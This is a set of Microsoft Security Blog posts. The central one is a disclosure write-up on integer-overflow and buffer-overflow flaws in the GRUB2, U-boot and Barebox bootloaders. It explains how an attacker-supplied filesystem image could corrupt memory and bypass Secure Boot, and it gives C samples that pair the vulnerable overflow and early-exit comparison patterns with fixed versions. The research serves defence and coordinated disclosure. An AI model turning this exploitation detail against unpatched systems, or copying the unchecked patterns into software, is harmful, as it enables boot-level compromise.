
Transforming public sector security operations in the AI era

The cyberthreat landscape is evolving at an unprecedented pace, becoming increasingly dangerous and complex. Nation-state threat actors and cybercriminals are employing advanced tactics and generative AI to execute highly sophisticated attacks. This situation is further compounded by outdated technology and systems, shortage of cybersecurity talent, and antiquated processes, which are inefficient in handling the scale, complexity, and ever-evolving nature of these cyberattacks. With 62% of all cyberattacks targeting public sector organizations, it is crucial for these sectors to leverage state-of-the-art technology, powered by generative AI, to transform their cyber defense and stay ahead of these evolving threats.1

Microsoft’s Unified Security Operations for Public Sector

Discover how Microsoft helps public sectors modernize security operations to enhance cyber defense and streamline processes.

Read the datasheet Microsoft’s unified security operations for public sector

Embracing modern security technology, processes, and continuous skill development is vital for protecting public sector organizations. By leveraging innovations powered by generative AI, unparalleled threat intelligence, and best practices, public sectors can transform their security operations to effectively defend against emerging cyberthreats.

AI-powered security operations: Microsoft delivers innovations to effectively protect against today’s complex threat landscape. The AI-powered unified security operations platform offers an enhanced and streamlined approach to security operations by integrating security information and event management (SIEM), security orchestration, automation, and response (SOAR), extended detection and response (XDR), posture and exposure management, cloud security, threat intelligence, and AI into a single, cohesive experience, eliminating silos and providing end-to-end security operations (SecOps). The unified platform boosts analyst efficiency, reduces context switching, and delivers quicker time to value with less integration work.

Microsoft is committed to helping public sector customers accelerate threat detection and response through improved security posture across organizations with richer insights, multi-tenant management, early warnings, and increased efficiency through automation and generative AI. Through automatic attack disruption, Microsoft Defender XDR utilizes robust threat intelligence, advanced AI and machine learning to detect and contain sophisticated cyberattacks in real time, significantly reducing their impact. This high-fidelity detection and protection capability disrupts more than 40,000 incidents each month, like identity threats and human-operated cyberattacks, while maintaining a false positive rate below 1%.

“Speed is an important factor against adversaries, and gaining situational awareness across a complex landscape of threats is therefore key.”

—Customer in the healthcare industry

People and process modernization: Public-private partnerships play a vital role in fostering the exchange of best practices and developing standardized processes that drive efficiency in incident response and threat intelligence sharing. For example, adapting the threat triage process to leverage generative AI agents can enable teams to scale significantly, with agents autonomously analyzing and triaging vast volumes of alerts in real time, prioritizing critical cyberthreats, and recommending specific remediation steps based on historical patterns. These collaborations also empower organizations to build teams equipped with cutting-edge skills and a comprehensive understanding of generative AI capabilities, helping them stay ahead of emerging cyberthreats.

Collective cyber defense and threat intelligence: Using Microsoft’s global threat intelligence insights, public sector organizations can collaborate with each other and across other sectors to share deeper cyberthreat insights efficiently. This partnership enables public sector organizations to exchange threat intelligence in a standardized manner within a region or country.

“Collective defense collaborations are driven by mutual interests with industry peers and cybersecurity alliances on improving security postures and responding more effectively to emerging threats.”

—Customer in the transport industry

The power of generative AI in cyber operations

Generative AI brings several transformative benefits to cybersecurity, making it a cornerstone for public sector security operations center (SOC) modernization.

Enhanced threat detection and response: Generative AI has the potential to sift through data from firewalls, endpoints, and cloud workloads, surfacing actionable cyberthreats that might go unnoticed in manual reviews. Unlike traditional rule-based detection methods, generative AI can identify attack patterns, adapt to emerging cyberthreats, and prioritize incidents based on risk severity, helping security teams focus on the most critical issues. Generative AI can go beyond simply surfacing cyberthreats; it can contextualize attack signals, predict potential breaches, and recommend guided responses for remediation strategies, reducing the burden on security analysts. Microsoft Security Copilot is already covering a range of use cases and is expanding rapidly to seize the full potential of generative AI. By providing guided incident investigation and response, Security Copilot helps security operations center (SOC) teams to detect and respond to cyberthreats more effectively. It can help teams to learn about malicious actors and campaigns, provide rapid summaries, and even contact the user to check for suspicious behavior. Adoption is associated with 30% reduction in security incident mean time to resolution (MTTR).2

Reduced operational overheads: By automating routine tasks, generative AI can free analysts from repetitive processes like alert triage or patch validation, enabling them to focus on advanced threat hunting. Security teams can already leverage Security Copilot to translate complex scripts into natural language, highlighting and explaining key parts to enhance team skills and reduce investigation time for advanced investigations as much as by 85%, helping security teams operate at scale.3

“Increased support from AI is critical given the significant capacity challenge in the public sector: a shortage of talent, an influx of threats, and an ever-increasing volume of data, assets, and organizations.”

—National SOC customer

Building a resilient digital future together

As nation-state threat actors and cybercriminals increasingly employ generative AI in their cyberattacks, public sector organizations can no longer rely on fragmented, manual defenses. The path forward lies in public-private collaboration, centered on co-designing and innovating solutions tailored to the public sector’s unique needs.

By adopting Microsoft Security solutions, public sector organizations can leverage combined resources, expertise, and cutting-edge technology to fortify critical infrastructure, safeguard citizen data, and strengthen public trust.

Now is the time to act: Modernize your cyber defense in the AI era to collectively forge a more secure and resilient digital future for government and public sector operations.

Learn more

Learn more about the AI-powered unified security operations platform.

Learn more about Microsoft Sentinel.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Microsoft Digital Defense Report 2024

2Generative AI and Security Operations Center Productivity: Evidence from Live Operations, Microsoft study. James Bono, Alec Xu, Justin Grana. November 24, 2024.

3The Total Economic Impact™ of Microsoft Sentinel, a commissioned study conducted by Forrester Consulting, March 2024. Results are based on a composite organization representative of interviewed customers.

The post Transforming public sector security operations in the AI era appeared first on Microsoft Security Blog.


Analyzing open-source bootloaders: Finding vulnerabilities faster with AI

Microsoft Malware Protection Center - Mon, 03/31/2025 - 12:00pm

By leveraging Microsoft Security Copilot to expedite the vulnerability discovery process, Microsoft Threat Intelligence uncovered several vulnerabilities in multiple open-source bootloaders, impacting all operating systems relying on Unified Extensible Firmware Interface (UEFI) Secure Boot as well as IoT devices. The vulnerabilities found in the GRUB2 bootloader (commonly used as a Linux bootloader) and the U-boot and Barebox bootloaders (commonly used for embedded systems) could allow threat actors to gain arbitrary code execution.

Using Security Copilot, we were able to identify potential security issues in bootloader functionalities, focusing on filesystems due to their high vulnerability potential. This approach saved our team approximately a week’s worth of time that would have otherwise been spent manually reviewing the content. Through a series of prompts, we identified and refined security issues, ultimately uncovering an exploitable integer overflow vulnerability. Copilot also assisted in finding similar patterns in other files, ensuring comprehensive coverage and validation of our findings. This efficient process allowed us to confirm several additional vulnerabilities and extend our analysis to other bootloaders like U-boot and Barebox, which share code with GRUB2. We’re sharing this research as an example of the increased efficiency, streamlined workflows, and improved capabilities that AI solutions like Security Copilot can deliver for defenders, security researchers, and SOC analysts. As AI continues to emerge as a key tool in the cybersecurity community, Microsoft emphasizes the importance of vendors and researchers maintaining their focus on information sharing. This approach ensures that AI’s advantages in rapid vulnerability discovery, remediation, and accelerated security operations can effectively counter malicious actors’ attempts to use AI to scale common attack tactics, techniques, and procedures (TTPs).

While threat actors would likely require physical device access to exploit the U-boot or Barebox vulnerabilities, in the case of GRUB2, the vulnerabilities could further be exploited to bypass Secure Boot and install stealthy bootkits or potentially bypass other security mechanisms, such as BitLocker. The implications of installing such bootkits are significant, as this can grant threat actors complete control over the device, allowing them to control the boot process and operating system, compromise additional devices on the network, and pursue other malicious activities. Furthermore, it could result in persistent malware that remains intact even after an operating system reinstallation or a hard drive replacement.

We disclosed these vulnerabilities to the GRUB2, U-boot, and Barebox maintainers and worked with the GRUB2 maintainers to contribute fixes for the discovered vulnerabilities. To address the issues, the GRUB2 maintainers released security updates on February 18, 2025, and both the U-boot and Barebox maintainers released updates on February 19, 2025. We thank the GRUB2, U-boot, and Barebox maintainers as well as the open-source community for their quick response and collaborative efforts in addressing these issues, and we advise users to ensure their instances are up to date. We would also like to thank the Red Hat support team for their assistance in disclosing these issues to manufacturers. The respective vulnerabilities are summarized in the following table:

Bootloader | Vulnerability
GRUB2 | CVE-2024-56737
GRUB2 | CVE-2024-56738
GRUB2 | CVE-2025-0677
GRUB2 | CVE-2025-0678
GRUB2 | CVE-2025-0684
GRUB2 | CVE-2025-0685
GRUB2 | CVE-2025-0686
GRUB2 | CVE-2025-0689
GRUB2 | CVE-2025-0690
GRUB2 | CVE-2025-1118
GRUB2 | CVE-2025-1125
U-boot | CVE-2025-26726
U-boot | CVE-2025-26727
U-boot | CVE-2025-26728
U-boot | CVE-2025-26729
Barebox | CVE-2025-26721
Barebox | CVE-2025-26722
Barebox | CVE-2025-26723
Barebox | CVE-2025-26724
Barebox | CVE-2025-26725

In this blog, we detail how Secure Boot and GRUB2 function, explain how the GRUB2 vulnerabilities could have been exploited, and provide information on the vulnerabilities found in other open-source bootloaders to highlight the risks associated with unknowingly sharing vulnerable code among different open-source projects. As the boot process involves multiple components spanning different manufacturers and vendors, updates and fixes to the Secure Boot process can be particularly complex and run the risk of rendering a device unusable. As such, we are also sharing these findings with the security community to emphasize the importance of responsible disclosure and collaboration in the effort to enhance protection technologies and security across different devices and platforms.

Secure Boot and GRUB2

Before 2006, Intel-based computers booted into startup firmware code commonly known as the BIOS (Basic Input/Output System), which was responsible for hardware initialization and setup of common services to later be used by a bootloader. Ultimately, the BIOS would transfer control to a bootloader coded in real mode, which would commonly load an operating system (OS).

With time, attackers realized there was no root-of-trust verification of bootloaders by the firmware, and thus began the era of bootkits, which are bootloader-based rootkits. To standardize the boot process, a unified firmware schema to replace BIOS was introduced in 2006, which is currently known as the Unified Extensible Firmware Interface (UEFI).

UEFI also helped combat bootkits, as it offers services that validate bootloaders and its own extensible modules by means of digital signatures. That protocol is known as Secure Boot and is essential to establishing a root of trust for the boot process, in which the firmware verifies UEFI drivers and OS modules with a platform key or a Key Exchange Key, and bootloaders verify the loaded operating system.

Trust is then achieved with the help of equipment manufacturers, which can sign code trusted by Secure Boot, by means of Certificate Authorities (CAs). Essentially, manufacturers sign code with their private key, and their public key is signed by a root CA, commonly Microsoft’s UEFI CA. This is also essential to supporting non-Windows bootloaders such as GRUB2 (which commonly boots Linux) and allowing third-party operating systems to benefit from Secure Boot. Since GRUB2 is fully open-sourced, vendors install a small program called a shim, which is signed by Microsoft’s UEFI CA and is responsible for validating the integrity of GRUB2. The shim can further consult a mechanism called Secure Boot Advanced Targeting (SBAT) for additional revocation and management options: the shim uses SBAT to track and revoke individual software components based on metadata rather than cryptographic signatures alone.

Figure 1. GRUB2 loading schema

The dangers of a GRUB2

Since bootloaders run before operating systems run, they mostly have UEFI-provided services as APIs to rely on. Therefore, bootloaders do not benefit from modern operating system security features, such as:

  • No-Execute (NX): Known in Windows as Data Execution Prevention (DEP), it enforces memory page execute protections. Before the introduction of NX, attackers could overwrite return addresses (which are maintained in memory) and jump to arbitrary code (commonly a shellcode) that could be placed using the provided input.
  • Address Space Layout Randomization (ASLR): This feature randomizes the base address of modules, which makes return address overwrites and function pointer overwrites highly unreliable, since attackers do not know where usable code might be found.
  • Safe dynamic allocators: Dynamic allocations are a favorite target for attackers, and modern operating systems harden their heap allocators with various techniques, including Safe Unlinking, type-safety, Pointer Authentication, and others.
  • Stack cookies / Canaries: These are randomly generated values pushed between the return address and local variables on the stack, with the intent of detecting changes in their values before using the return address (commonly in a RET instruction).

Additionally, GRUB2 offers complex logic to implement various features, including:

  • Image file parsers (PNG, TGA, and JPEG)
  • Font parsing and support (PF2 file format)
  • Network support (HTTP, FTP, DNS, ICMP, etc.)
  • Various filesystem supportability (FAT, NTFS, EXT, JFS, HFS, ReiserFS, etc.)
  • Bash-like command-line utility
  • Extensible dynamic module loading capabilities

Furthermore, GRUB2 is coded in C, which is considered a memory-unsafe language, and as mentioned, does not benefit from any modern security mitigation. Considering the implication of defeating Secure Boot and strategically assessing the project (such as with Google’s Rule of 2), it is evident why GRUB2 may be of interest to vulnerability researchers.

Several memory corruption vulnerabilities have been uncovered in the past and are evidence of the risks that we have mentioned. Noteworthy examples include:

Vulnerability | Subsystem(s) | Description
CVE-2020-10713 | Configuration file | Published under the name “Boot Hole”; a buffer overflow in the parsing of the GRUB2 configuration file (grub.cfg).
CVE-2021-3695, CVE-2021-3696, CVE-2021-3697 | Image parsing | Several buffer overflow vulnerabilities were discovered when parsing images.
CVE-2022-28733, CVE-2022-28734 | Network | Various buffer overflow vulnerabilities when parsing IP or HTTP packets.
CVE-2022-28735 | Shim | It was discovered that non-kernel files could be loaded and execute arbitrary code.
CVE-2023-4692 | NTFS (filesystem) | A heap out-of-bounds access was discovered in the NTFS filesystem implementation for GRUB2.

Findings

Through a combination of static code analysis tools (such as CodeQL), fuzzing the GRUB2 emulator (grub-emu) with AFL++, manual code analysis, and using Microsoft Security Copilot, we have uncovered several vulnerabilities.

Using Security Copilot, we initially explored which functionalities in a bootloader have the most potential for vulnerabilities, with Copilot identifying network, filesystems, and cryptographic signatures as key areas of interest. Given our ongoing analysis of network vulnerabilities and the fact that cryptography is largely handled by UEFI, we decided to focus on filesystems.

Using the JFFS2 filesystem code as an example, we prompted Copilot to find all potential security issues, including exploitability analysis. Copilot identified multiple security issues, which we refined further by requesting Copilot to identify and provide the five most pressing of these issues. In our manual review of the five identified issues, we found three were false positives, one was not exploitable, and the remaining issue, which warranted our attention and further investigation, was an integer overflow vulnerability.

Figure 2. Security Copilot spotting an integer overflow vulnerability and suggesting a fix

We used Security Copilot to successfully identify similar patterns in other GRUB2 files. Assuming the possibility of false negatives, we performed thorough validation and review of GRUB2 to avoid overlooking any issues, allowing us to confirm several additional vulnerabilities were present relating to the integer overflow.

Through this research, we have disclosed the following vulnerabilities:

Module | Vulnerability | CVE
UFS (filesystem) | Buffer overflow in symbolic link handling due to an integer overflow in allocation. | CVE-2025-0677
Squash4 (filesystem) | Buffer overflow in file reads due to an integer overflow in allocation. | CVE-2025-0678
ReiserFS (filesystem) | Buffer overflow in symbolic link handling due to an integer overflow in allocation. | CVE-2025-0684
JFS (filesystem) | Buffer overflow in symbolic link handling due to an integer overflow in allocation. | CVE-2025-0685
RomFS (filesystem) | Buffer overflow in symbolic link handling due to an integer overflow in allocation. | CVE-2025-0686
UDF (filesystem) | Buffer overflow in block reads of UDF due to an out-of-bounds operation. | CVE-2025-0689
HFS (filesystem) | Buffer overflow in filesystem mounting due to a wild strcpy call on a non-NUL-terminated string. | CVE-2024-56737
HFS (filesystem) compression | Buffer overflow in file opens due to an integer overflow in allocation. | CVE-2025-1125
Crypto (cryptography) | Cryptographic side-channel attack due to non-constant-time memory comparison. | CVE-2024-56738
Read (commands) | The read command is intended to read a line from the keyboard and assign its text to a variable; it is susceptible to a signed integer overflow and an out-of-bounds write. | CVE-2025-0690
Dump (commands) | While the memory reading commands (such as read_byte) are disabled in production, the dump command was left enabled and can be used to read arbitrary memory addresses. | CVE-2025-1118

Most of those vulnerabilities are simple memory corruption vulnerabilities. As an example, let us examine the JFS symbolic link resolution function:

Figure 3. Vulnerable symbolic link resolution code in JFS

The vulnerability is an overflow of the size variable:

  • The size variable is declared as grub_size_t, which is ultimately defined as a 64-bit unsigned integer (uint64_t).
  • The function grub_le_to_cpu64 converts a little-endian 64-bit value to the CPU’s native endianness. Since x86-64 is already little-endian, it does nothing there (on big-endian systems it reverses the byte order of the 64-bit input value).
  • The input data and its inode are fully attacker-controlled, since the attacker supplies the filesystem image. Therefore, size can take an arbitrary value, including 0xFFFFFFFFFFFFFFFF (the maximum value an unsigned 64-bit integer can hold).
  • The linknest checks are irrelevant to the vulnerability; they only ensure that the number of nested symbolic links does not exceed a limit (defined as 8).
  • The size+1 calculation is an integer overflow: if size is 0xFFFFFFFFFFFFFFFF, then size+1 wraps to 0. grub_malloc happily allocates a 0-byte chunk and returns it in the variable symlink.
  • At this point, symlink is written to by the function grub_jfs_read_file. The contents are set by the attacker, and while this function will never be able to read 0xFFFFFFFFFFFFFFFF bytes, an attacker can still overwrite important data beyond the bounds of the symlink buffer with an arbitrary payload.

It seems GRUB2 maintainers were aware of other types of integer overflow issues in the past and therefore introduced functions such as grub_add and grub_mul to handle addition and multiplication overflows safely. However, it seems there are quite a few places where those functions have not been considered.
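To make the wrap concrete, here is an added C example; it is not GRUB2’s code, and the function names (read_symlink_checked and friends) and the sample image bytes are constructed for this illustration. It places the unchecked size + 1 length calculation beside a checked version built on __builtin_add_overflow, the compiler builtin that GRUB2’s grub_add wraps, and the checked resolver additionally refuses a claimed size larger than the data the image actually holds, which is the second bound a parser of attacker-supplied metadata needs even when the arithmetic does not wrap.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Mirrors the GRUB2 typedef: an unsigned 64-bit size on x86-64. */
typedef uint64_t grub_size_t;

/* The unchecked pattern: how many bytes does the allocation request?
 * Unsigned arithmetic in C wraps modulo 2^64, so for size == UINT64_MAX
 * the sum is 0; malloc(0) then "succeeds" and every later write into the
 * returned chunk lands outside it. */
grub_size_t symlink_alloc_len_unchecked(grub_size_t size)
{
    return size + 1;
}

/* The checked pattern: __builtin_add_overflow stores the sum in *out and
 * returns nonzero if it wrapped. Returns 0 on success, -1 if size + 1
 * cannot be represented in a grub_size_t. */
int symlink_alloc_len_checked(grub_size_t size, grub_size_t *out)
{
    if (__builtin_add_overflow(size, (grub_size_t)1, out))
        return -1;
    return 0;
}

/* Resolve a symlink target of `size` bytes from inode data that the
 * filesystem image (and therefore its author) controls: reject the length
 * before allocating, refuse a size the image cannot back, then copy and
 * NUL-terminate. Returns a malloc'd string, or NULL on overflow, on a
 * size larger than the available data, or on allocation failure. */
char *read_symlink_checked(const uint8_t *data, grub_size_t data_len,
                           grub_size_t size)
{
    grub_size_t len;
    if (symlink_alloc_len_checked(size, &len) != 0)
        return NULL;                 /* size + 1 would wrap to 0 */
    if (size > data_len)
        return NULL;                 /* inode claims more than the image holds */
    char *symlink = malloc(len);
    if (!symlink)
        return NULL;
    memcpy(symlink, data, size);
    symlink[size] = '\0';
    return symlink;
}

int main(void)
{
    /* Constructed sample: a short symlink target as an image would carry it. */
    const uint8_t image[] = "/boot/vmlinuz";
    grub_size_t image_len = sizeof image - 1;

    char *ok = read_symlink_checked(image, image_len, image_len);
    printf("valid target: %s\n", ok ? ok : "(null)");
    free(ok);

    printf("unchecked length for 0xFFFFFFFFFFFFFFFF: %llu\n",
           (unsigned long long)symlink_alloc_len_unchecked(UINT64_MAX));
    printf("checked resolver for 0xFFFFFFFFFFFFFFFF: %s\n",
           read_symlink_checked(image, image_len, UINT64_MAX) ? "allocated" : "rejected");
    return 0;
}
```

Build with GCC or Clang (cc -std=c11 demo.c); the unchecked function returns 0 for the maximum value precisely because the wrap is well-defined for unsigned types, so no compiler warning will catch it, and the checked resolver is where that class of bug is stopped.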

Figure 4. Proper symbolic link resolution in EXT2 filesystem—note how grub_add is used to check for overflows

The other vulnerabilities we’ve reported had similar out-of-bounds or integer overflow issues. In addition, we have reported a cryptographic side-channel issue, in which the function grub_crypto_memcmp does not perform its memory comparison in constant time. The vulnerability is quite similar to one we disclosed on Netgear routers in the past.
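An added example of the property at issue (this is neither GRUB2’s grub_crypto_memcmp nor the maintainers’ fix): an early-exit byte comparison beside one that runs in constant time. The helper bytes_inspected_early_exit is constructed for this illustration to show that the early-exit loop’s work depends on the length of the matching prefix, which is the quantity that leaks through timing, while the constant-time version always processes all n bytes and folds every difference into a single accumulator with no data-dependent branch.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Early-exit comparison: returns at the first differing byte, so the time
 * taken depends on how long the prefix matched. Fine for sorting, wrong
 * for comparing secrets such as MACs, signatures or password hashes. */
int memcmp_early_exit(const void *a, const void *b, size_t n)
{
    const uint8_t *x = a, *y = b;
    for (size_t i = 0; i < n; i++)
        if (x[i] != y[i])
            return x[i] - y[i];
    return 0;
}

/* Instrumented copy of the early-exit loop that reports how many bytes
 * were inspected before it stopped: the work (and so the timing) grows
 * with the length of the matching prefix. */
size_t bytes_inspected_early_exit(const void *a, const void *b, size_t n)
{
    const uint8_t *x = a, *y = b;
    size_t i;
    for (i = 0; i < n; i++)
        if (x[i] != y[i])
            return i + 1;
    return n;
}

/* Constant-time comparison: always touches all n bytes and ORs every
 * XOR difference into one accumulator. volatile discourages the compiler
 * from reintroducing an early exit. Returns 0 if equal, 1 otherwise, and
 * deliberately gives no ordering information. */
int memcmp_constant_time(const void *a, const void *b, size_t n)
{
    const volatile uint8_t *x = a;
    const volatile uint8_t *y = b;
    uint8_t diff = 0;
    for (size_t i = 0; i < n; i++)
        diff |= x[i] ^ y[i];
    /* Collapse 0..255 into 0 or 1 without a branch: for nonzero diff,
     * diff | -diff always has its top bit set. */
    return (int)((diff | (uint8_t)-diff) >> 7);
}

int main(void)
{
    /* Constructed sample: a 16-byte tag and two wrong guesses that differ
     * in the first byte and in the last byte respectively. */
    const char tag[] = "0123456789abcdef";
    char wrong_first[17], wrong_last[17];
    memcpy(wrong_first, tag, 17);
    memcpy(wrong_last, tag, 17);
    wrong_first[0] = 'X';
    wrong_last[15] = 'X';

    printf("early-exit inspected %zu byte(s) for a first-byte mismatch\n",
           bytes_inspected_early_exit(tag, wrong_first, 16));
    printf("early-exit inspected %zu byte(s) for a last-byte mismatch\n",
           bytes_inspected_early_exit(tag, wrong_last, 16));
    printf("constant-time: equal=%d, first=%d, last=%d\n",
           memcmp_constant_time(tag, tag, 16),
           memcmp_constant_time(tag, wrong_first, 16),
           memcmp_constant_time(tag, wrong_last, 16));
    return 0;
}
```

The two inspected-byte counts (1 versus 16) are the whole story: an observer who can time the comparison learns how many leading bytes of a guess were right, whereas the constant-time version does the same amount of work whichever byte differs.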

Variant analysis and extensions to other bootloaders

After the discovery of the GRUB2 filesystem vulnerabilities and validating their exploitability, we concluded it is very likely other bootloaders might be affected by similar vulnerabilities, potentially as a result of the practice of copy-pasting filesystem parsing code between different open-source projects.

To test this hypothesis, we asked Security Copilot to find similar code in GitHub based on GRUB2’s filesystem implementations. This approach initially found many GRUB2 forks, so we continued to refine the search and manually review the results. Within those results, the U-boot and Barebox bootloaders, which are both commonly used for embedded systems, were identified as having shared code with GRUB2. Further investigation led us to identify similar vulnerabilities in both bootloaders, as detailed in the table below.

Bootloader | Vulnerability | Description
U-boot | CVE-2025-26726 | SquashFS directory table parsing buffer overflow
U-boot | CVE-2025-26727 | SquashFS inode parsing buffer overflow
U-boot | CVE-2025-26728 | SquashFS nested file reading buffer overflow
U-boot | CVE-2025-26729 | EroFS symlink resolution buffer overflow
Barebox | CVE-2025-26721 | Buffer overflow in the persistent storage for file creation
Barebox | CVE-2025-26722 | Buffer overflow in SquashFS symlink resolution
Barebox | CVE-2025-26723 | Buffer overflow in EXT4 symlink resolution
Barebox | CVE-2025-26724 | Buffer overflow in CramFS symlink resolution
Barebox | CVE-2025-26725 | Buffer overflow in JFFS2 dirent parsing

To exploit those in an embedded system context, attackers would most likely require physical access to those devices.

Enhancing security beyond Microsoft with research and threat intelligence sharing

As our research demonstrates, the discovered vulnerabilities can affect a wide range of systems and devices, with varying severity. The vulnerabilities in GRUB2 can be exploited to bypass Secure Boot and allow threat actors to gain arbitrary code execution in the context of GRUB2, install stealthy bootkits and persistent malware, and compromise additional devices on the network. Additionally, there are further consequences to bypassing Secure Boot, as it undermines the security mechanism designed to protect the boot process. Secure Boot bypasses can lead to threat actors loading untrusted software and malicious code during the boot process, evading detection by security solutions, and gaining full control of the system, for potential widespread impact across operating systems relying on UEFI Secure Boot. While the vulnerabilities impacting U-boot and Barebox may be more difficult for threat actors to exploit, since they require physical device access, the issues still underscore the dangers of sharing susceptible code across multiple open-source projects.

This research also demonstrates the necessity of responsible vulnerability disclosure, threat intelligence sharing, and partner collaboration in addressing these issues to safeguard users against current and future threats. Given the complexity of the boot process, which involves multiple components from different manufacturers, coupled with the fact that updates to Secure Boot can run the risk of rendering a device unusable, responsible disclosure of these vulnerabilities is necessary to prevent threat actor exploitation and give teams time to effectively coordinate and collaborate on mitigation measures.

To address the discovered issues, the GRUB2 maintainers updated the vulnerable versions in SBAT while working with manufacturers to update DBX database entries as well as their shims to improve Secure Boot revocation management, particularly for bootloaders like shim that act as an intermediary between firmware Secure Boot verification and Linux distributions’ boot processes. In addition to deploying patches to address the vulnerabilities, the GRUB2 maintainers disabled some of the OS modules when Secure Boot is enabled to help ensure only trusted and verified code executes during the boot process, further reducing the attack surface. We would like to again thank the GRUB2 team and open-source community for their efforts in addressing these issues, as well as the U-boot and Barebox maintainers for quickly releasing fixes.

Leveraging AI like Security Copilot was invaluable in our research, saving us approximately a week’s worth of time by efficiently identifying and refining security issues in bootloader functionalities, ultimately allowing us to uncover several vulnerabilities. Identifying, disclosing, and contributing fixes for vulnerabilities, such as those mentioned in this blog post, is part of our ongoing commitment to enhance security at Microsoft and beyond. Microsoft is dedicated to improving security through research-driven protections and collaboration with customers, partners, and industry experts. Microsoft security researchers discover vulnerabilities and threats, translating this knowledge into enhanced solutions that protect users daily, and by expanding our research, we also contribute to the security of devices worldwide across all platforms.

Jonathan Bar Or

Microsoft 365 Defender Research Team

Learn more

Security Copilot customers can use the standalone experience to create their own prompts or run pre-built promptbooks to automate incident response or investigation tasks related to this threat.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Analyzing open-source bootloaders: Finding vulnerabilities faster with AI appeared first on Microsoft Security Blog.


New innovations in Microsoft Purview for protected, AI-ready data

Microsoft Malware Protection Center - Mon, 03/31/2025 - 11:00am

The Microsoft Fabric and Microsoft Purview teams are excited to be in Las Vegas from March 31 to April 2, 2025, for the second annual and highly anticipated Microsoft Fabric Community Conference. With more than 200 sessions, 13 focused tracks, 21 hands-on workshops, and two keynotes, attendees can expect an engaging and informative experience. The conference offers a unique opportunity for the community to connect and exchange insights on key topics such as data and AI.

Microsoft Purview: Built to safeguard your AI innovation

AI innovation is impacting every industry, business process, and individual. About 75% of knowledge workers today are currently using some sort of AI in their day-to-day work.1 At the same time, the regulatory landscape is evolving at an unprecedented pace. Around the world, at least 69 countries have proposed more than 1,000 AI-related policy initiatives and legal frameworks to address public concerns around AI safety and governance.2 With the need to adhere to regulations and policy frameworks for AI transformation, a comprehensive solution is needed to address security, governance, and privacy concerns. Additionally, with the convergence of the responsibilities of cybersecurity and data teams, customers are asking for a solution that turns data security and data governance into a team sport to address issues such as data discovery, data classification, data loss prevention, and data quality in a unified way. Microsoft Purview delivers a comprehensive set of solutions that address these needs, helping customers seamlessly secure and confidently activate their data in the era of AI.

We are excited to announce new innovations that help security and data teams accelerate their organization’s AI transformation:

  1. Enhancing Microsoft Purview Data Loss Prevention (Purview DLP) support for lakehouse in Microsoft Fabric to help prevent sensitive data loss by restricting access.
  2. Expanding Purview DLP policy support for additional Fabric items such as KQL databases and Mirrored databases to send users notification through policy tips when they are working with sensitive data.
  3. Microsoft Purview integration with Copilot in Fabric, specifically for Power BI.
  4. Data Observability within the Microsoft Purview Unified Catalog.

Seamlessly secure data

Microsoft Purview is extending its proven data security value delivered to millions of Microsoft 365 users worldwide, to the Microsoft data platform. This helps users drive consistency across their multicloud and multiplatform data estate and simplify risks related to data leaks, oversharing, and risky user behavior as more users are managing and handling data in the era of AI.

1. Enhancing Microsoft Purview Data Loss Prevention (DLP) support for lakehouse in Fabric to help prevent sensitive data loss by restricting access

Microsoft Purview Data Security capabilities are used by hundreds of thousands of customers for their integration with Microsoft 365 data. Since last year’s Microsoft Fabric Community Conference, Microsoft Purview has extended Microsoft Purview Information Protection and Purview DLP policy tip value across the data estate, including Fabric. Currently, Purview DLP supports the ability to show users notifications for when they are working with sensitive data in lakehouse. We are excited to share that we are enhancing the DLP value in lakehouse to prevent sensitive data leakage to guest users by restricting access. Data Security admins can configure policies and limit access to only internal users or data owners based on the sensitive data found. This control is valuable for when a Fabric tenant includes guest users and domain owners want to limit access to internal proprietary data in their lakehouses. 

Figure 1. DLP policy restricting access for guest users into lakehouse due to personally identifiable information (PII) data discovered 

Learn more about Microsoft Purview Data Loss Prevention

2. Expanding DLP policy support for additional Fabric items such as KQL databases and Mirrored databases to show users notification through policy tips when they are working with sensitive data

A key part of securing sensitive data is giving your users visibility into where and how they are interacting with it. Purview DLP policies can notify users when they are working with sensitive data through policy tips in lakehouse in Fabric. We are excited to announce that we are extending policy tips support, in preview, to additional Fabric items: KQL databases and Mirrored databases. (Mirrored database sources include Azure Cosmos DB, Azure SQL Database, Azure SQL Managed Instance, Azure Databricks Unity Catalog, and Snowflake, with more sources available soon.) KQL databases are the only databases used for real-time analytics, so detecting sensitive data that arrives through real-time analytics is significant for Fabric customers. Purview DLP for Mirrored databases reduces the risk of sensitive data leakage when data is transferred in Fabric. We are happy to extend Purview DLP value to more data sources, providing end-to-end protection for customers within their Fabric environments, all in preparation for the safe deployment of AI.

Figure 2. Policy tip triggered by Purview DLP due to PII being discovered in KQL databases.

Figure 3. Policy tip triggered by Purview DLP due to PII being discovered in Mirrored databases.

3. Microsoft Purview for Copilot in Fabric

As organizations adopt AI, implementing data controls and a Zero Trust approach is crucial to mitigate risks like data oversharing and leakage, and potential non-compliant usage in AI. We are excited to announce Microsoft Purview capabilities in preview for Copilot in Fabric, starting with Copilot for Power BI. By combining Microsoft Purview and Copilot for Power BI, users can:

  • Discover data risks such as sensitive data in user prompts and responses and receive recommended actions in their Microsoft Purview Data Security Posture Management (DSPM) dashboard to reduce these risks.
  • Identify risky AI usage with Microsoft Purview Insider Risk Management to investigate risky AI usage, such as an inadvertent user who has neglected security best practices and shared sensitive data in AI or a departing employee using AI to find sensitive data and exfiltrating the data through a USB device.
  • Govern AI usage with Microsoft Purview Audit, Microsoft Purview eDiscovery, retention policies, and non-compliant usage detection.

Figure 4. Purview DSPM for AI provides admins with comprehensive reports on Copilot in Fabric’s user activities, as well as data entered and shared within the copilot.

Confidently activate data

4. Data observability, now in preview, within Microsoft Purview Unified Catalog

